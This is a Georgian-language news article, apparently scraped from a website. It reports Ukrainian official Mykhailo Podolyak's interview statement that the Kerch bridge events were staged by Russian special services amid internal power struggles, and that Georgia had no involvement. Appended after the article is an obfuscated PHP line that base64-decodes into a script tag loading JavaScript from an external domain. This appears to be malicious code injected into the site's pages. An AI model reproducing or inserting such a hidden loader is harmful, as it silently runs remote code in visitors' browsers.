celsiusi
ავერსი შნაიდერი
ქერჩის ხიდზე მომხდარი მოვლენები იყო მხოლოდ და მხოლოდ რუსეთის სპეციალური სამსახურის - სახელად „ეფეს ბეს“ მიერ მომზადებული – ამის შესახებ უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩეველი მიხაილო პოდოლიაკი რადიო "მაესტროსთან" ინტერვიუში საუბრობს.
 
"ნება მომეცით წერტილი დავსვა აღნიშნულ საკითხზე. არავითარი საქართველო და საქართველოს მოქალაქეები არ ყოფილან. ეს ძალიან მნიშვნელოვანია! პირველი: ჩვენ ვთვლით, რომ რუსეთის ფედერაციის ყველა სამხედრო ინფრასტრუქტურა, ასევე მათ მიერ აშენებული უკანონო მშენებლობა, რომელსაც მიეკუთვნება ქერჩის ხიდი,  ჩვენთვის სამხედრო სამიზნეს წარმოადგენს. საერთაშორისო სამართლის ჩარჩოებიდან გამომდინარე, ჩვენ გვაქვს აბსოლუტური შესაძლებლობა ეს წერტილები გავანადგუროთ. მეორე: ქერჩის ხიდზე მომხდარი მოვლენები იყო მხოლოდ და მხოლოდ რუსეთის სპეციალური სამსახურის - სახელად „ეფეს ბეს“ მიერ მომზადებული. თუ რა მიზანს ემსახურებოდა ეს მოვლენა? – გეტყვით, რომ ეს დიდი ალბათობით გამოწვეული იყო პუტინის გარემოცვაში ძალოვნების შიდა დაპირისპირებისგან, რის შემდეგაც უნდა  მომხდარიყო და მოხდა კიდეც  რიგი გენერლების დაკავებები. ჩვენ ვხედავთ ბატონი პრიგოჟინის განცხადებებს, სურავიკინის დანიშვნას, რომელიც გერასიმოვიჩისა და შოუგუს ვერტიკალში არ ჯდებიან. ასევე, აშკარაა პუტინის დისტანცირება და დაშორება თავდაცვის მინისტრ შოუგუსგან, რომელიც ცოტახნის წინ პუტინის ფავორიტი იყო. სწორედ აქედან გამომდინარე ვთვლით, რომ ქერჩის ხიდის მოვლენები რუსეთში შიდა კონფლიქტის გამოვლინებაა.  ამიტომ ვაცხადებ, რომ არანაირ კავშირში არ ვართ ქერჩის ხიდზე მომხდართან. უკრაინას რომ მიეტანა დარტყმები, ჩვენ ამას დავადასტურებდით. რუსეთი უსაფრთხოების ფედერალური სამსახურის ხელმძღვანელის ბორტნიკოვის პირით, რომ  ადანაშაულებს ბულგარეთს, საქართველოს და სხვა ქვეყნებს  აღნიშნულზე ხაზ გასმით მინდა ვთქვა, რომ ეს ქვეყნები არანაირ კავშირში არ არიან ქერჩის ხიდზე მომხდარ მოვლენებთან." – განაცხადა პოდოლიაკმა.   
 
ინტერვიუს სრული ვერსიის ნახვა შესაძლებელია აქ:
 
471
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");